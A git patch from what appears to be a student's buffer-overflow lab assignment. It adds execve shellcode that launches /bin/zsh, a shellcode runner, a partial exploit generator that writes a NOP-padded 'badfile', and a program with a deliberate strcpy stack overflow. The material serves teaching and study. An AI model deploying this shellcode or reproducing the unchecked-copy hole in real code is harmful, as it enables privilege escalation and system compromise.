From 2f9a0e6b31751ee97ffcc9752b94391c383ff6f0 Mon Sep 17 00:00:00 2001
From: Alex Huddleston <adh9694@gmail.com>
Date: Mon, 12 Feb 2018 04:57:21 -0600
Subject: [PATCH] organizing. Initial hw2 commit.

---
 ethernet_header.h => hw1/ethernet_header.h   |   0
 set_device.cpp => hw1/set_device.cpp         |   0
 sniffex.c => hw1/sniffex.c                   |   0
 spoof.c => hw1/spoof.c                       |   0
 test_filtering.cpp => hw1/test_filtering.cpp |   0
 tfsession.pcap => hw1/tfsession.pcap         | Bin
 hw2/badfile                                  | Bin 0 -> 517 bytes
 hw2/call_shellcode.c                         |  27 +++++++++++++
 hw2/exploit.c                                |  39 +++++++++++++++++++
 hw2/shellcode.c                              |   9 +++++
 hw2/stack.c                                  |  27 +++++++++++++
 11 files changed, 102 insertions(+)
 rename ethernet_header.h => hw1/ethernet_header.h (100%)
 rename set_device.cpp => hw1/set_device.cpp (100%)
 rename sniffex.c => hw1/sniffex.c (100%)
 rename spoof.c => hw1/spoof.c (100%)
 rename test_filtering.cpp => hw1/test_filtering.cpp (100%)
 rename tfsession.pcap => hw1/tfsession.pcap (100%)
 create mode 100644 hw2/badfile
 create mode 100755 hw2/call_shellcode.c
 create mode 100755 hw2/exploit.c
 create mode 100755 hw2/shellcode.c
 create mode 100755 hw2/stack.c

diff --git a/ethernet_header.h b/hw1/ethernet_header.h
similarity index 100%
rename from ethernet_header.h
rename to hw1/ethernet_header.h
diff --git a/set_device.cpp b/hw1/set_device.cpp
similarity index 100%
rename from set_device.cpp
rename to hw1/set_device.cpp
diff --git a/sniffex.c b/hw1/sniffex.c
similarity index 100%
rename from sniffex.c
rename to hw1/sniffex.c
diff --git a/spoof.c b/hw1/spoof.c
similarity index 100%
rename from spoof.c
rename to hw1/spoof.c
diff --git a/test_filtering.cpp b/hw1/test_filtering.cpp
similarity index 100%
rename from test_filtering.cpp
rename to hw1/test_filtering.cpp
diff --git a/tfsession.pcap b/hw1/tfsession.pcap
similarity index 100%
rename from tfsession.pcap
rename to hw1/tfsession.pcap
diff --git a/hw2/badfile b/hw2/badfile
new file mode 100644
index 0000000000000000000000000000000000000000..d644f843d93a7fbe7189085c6f7ef985b858c7cc
GIT binary patch
literal 517
mcmXp!5Rjo?Rh*HbpOl%``8XiB^Wn@5+-DmYCX9j+69NEeNFV0_

literal 0
HcmV?d00001

diff --git a/hw2/call_shellcode.c b/hw2/call_shellcode.c
new file mode 100755
index 0000000..bd777e8
--- /dev/null
+++ b/hw2/call_shellcode.c
@@ -0,0 +1,27 @@
+/* call_shellcode.c */
+/*A program that creates a file containing code for launching shell*/
+
+#include <stdlib.h>
+#include <stdio.h>
+#include <string.h>
+
+const char code[] =
+	"\x31\xc0" /* Line 1: xorl %eax,%eax */
+	"\x50" /* Line 2: pushl %eax */
+	"\x68""/zsh" /* Line 3: pushl $0x68732f2f */
+	"\x68""/bin" /* Line 4: pushl $0x6e69622f */
+	"\x89\xe3" /* Line 5: movl %esp,%ebx */
+	"\x50" /* Line 6: pushl %eax */
+	"\x53" /* Line 7: pushl %ebx */
+	"\x89\xe1" /* Line 8: movl %esp,%ecx */
+	"\x99" /* Line 9: cdql */
+	"\xb0\x0b" /* Line 10: movb $0x0b,%al */
+	"\xcd\x80" /* Line 11: int $0x80 */
+;
+
+int main(int argc, char **argv)
+{
+	char buf[sizeof(code)];
+	strcpy(buf, code);
+	((void(*)( ))buf)( );
+}
diff --git a/hw2/exploit.c b/hw2/exploit.c
new file mode 100755
index 0000000..6f0c834
--- /dev/null
+++ b/hw2/exploit.c
@@ -0,0 +1,39 @@
+/* exploit.c */
+
+/* A program that creates a file containing code for launching shell*/
+
+#include <stdlib.h>
+#include <stdio.h>
+#include <string.h>
+
+char shellcode[]=
+    "\x31\xc0" /* xorl %eax,%eax */
+    "\x50" /* pushl %eax */
+    "\x68""/zsh" /* pushl $0x68732f2f */
+    "\x68""/bin" /* pushl $0x6e69622f */
+    "\x89\xe3" /* movl %esp,%ebx */
+    "\x50" /* pushl %eax */
+    "\x53" /* pushl %ebx */
+    "\x89\xe1" /* movl %esp,%ecx */
+    "\x99" /* cdql */
+    "\xb0\x0b" /* movb $0x0b,%al */
+    "\xcd\x80" /* int $0x80 */
+;
+
+int main(int argc, char **argv)
+{
+    char buffer[517];
+    FILE *badfile;
+    
+    /* Initialize buffer with 0x90 (NOP instruction) */
+    memset(&buffer, 0x90, 517);
+    
+    /* You need to fill the buffer with appropriate contents here */
+    strcpy(buffer, shellcode);
+
+    /* Save the contents to the file "badfile" */
+    badfile = fopen("./badfile", "w");
+    
+    fwrite(buffer, 517, 1, badfile);
+    fclose(badfile);
+}
diff --git a/hw2/shellcode.c b/hw2/shellcode.c
new file mode 100755
index 0000000..16367dc
--- /dev/null
+++ b/hw2/shellcode.c
@@ -0,0 +1,9 @@
+#include <stdio.h>
+#include <string.h>
+
+int main( ) {
+	char *name[2];
+	name[0] = "/bin/zsh";
+	name[1] = NULL;
+	execve(name[0], name, NULL);
+}
diff --git a/hw2/stack.c b/hw2/stack.c
new file mode 100755
index 0000000..4fba173
--- /dev/null
+++ b/hw2/stack.c
@@ -0,0 +1,27 @@
+/* stack.c */
+
+/* This program has a buffer overflow vulnerability. */
+/* Our task is to exploit this vulnerability */
+
+#include <stdlib.h>
+#include <stdio.h>
+#include <string.h>
+
+int bof(char *str)
+{
+    char buffer[12];
+    /* The following statement has a buffer overflow problem */
+    strcpy(buffer, str);
+    return 1;
+}
+
+void main(int argc, char **argv)
+{
+    char str[517];
+    FILE *badfile;
+    badfile = fopen("badfile", "r");
+    fread(str, sizeof(char), 517, badfile);
+    bof(str);
+    printf("Returned Properly\n");
+    return 1;
+}